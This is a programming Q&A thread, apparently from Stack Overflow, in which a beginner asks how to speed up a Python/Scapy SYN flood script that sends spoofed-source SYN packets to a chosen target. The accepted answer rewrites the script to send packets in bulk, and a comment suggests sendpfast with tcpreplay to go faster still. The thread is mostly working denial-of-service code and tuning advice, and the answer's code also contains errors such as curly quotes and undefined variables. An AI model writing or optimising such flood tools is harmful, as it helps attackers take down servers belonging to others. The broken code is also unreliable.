# How can i improve the code? packets send per second performance should improve. i am a beginner

Tags: python-3.x

I am a trying to create a tool which will perform SYNFLOOD to a target server. Everything works fine but the performance of the script leaves much to desire. Can anyone suggest ways to maximize the performance of this tool?

```py
from scapy.all import *
import random

def synflood(targetip):
    sp = random.randint(1025,65535)
    print ("Selected random source port is ---->",sp)
    s = conf.L3socket(iface='eth0')
  s.send(IP(src=RandIP(),dst=targetip)/TCP(sport=sp,dport=80,flags="S"))

print("Enter target ip:")
tar = input("")
p = input("Enter the number of request to be send to the target:")
pi = int(p)
i = 0
while i < pi:
    print("***********************************************************")
    print ("Sending SYN packets with Random Source and Random port:")
    synflood(tar)
    i += 1
    print ("End of Attack number:",i)
    print("***********************************************************")

print("END!")
```

Comment: Hi ! Please fix the indentation of your code :/ it’s hard to read

Answer (score 0, accepted):

If you dont mind to know what port are used (it allow us to remove the print), you can use this revised version of your code.

Also note that printing is slow. If you remove the print statements, everything is mostly faster

```
from scapy.all import *

def synflood(targetip, count):
    # sends multiple packets (count)
    send(IP(src=RandIP(),dst=targetip)/TCP(sport=RandNum(1025,65535),dport=80,flags="S"), iface=“eth0”, count=count)

print("Enter target ip:")
tar = input("")
p = input("Enter the number of request to be send to the target:")
print(“******”)
print ("Sending SYN packets with Random Source and Random port:")
synflood(tar, p)
print ("End of Attack number:",i)
print("******”)
# remember to close the socket
s.close()
print(“End!”)
```

Comment: Thanks for the help ! Much appreciated

Comment: Can i use Threading to improve the performance of this code ?

Comment: I don’t think so... you may also use `sendpfast(Ether()/IP...)` (note the Ether()/ ) which use tcpreplay for performances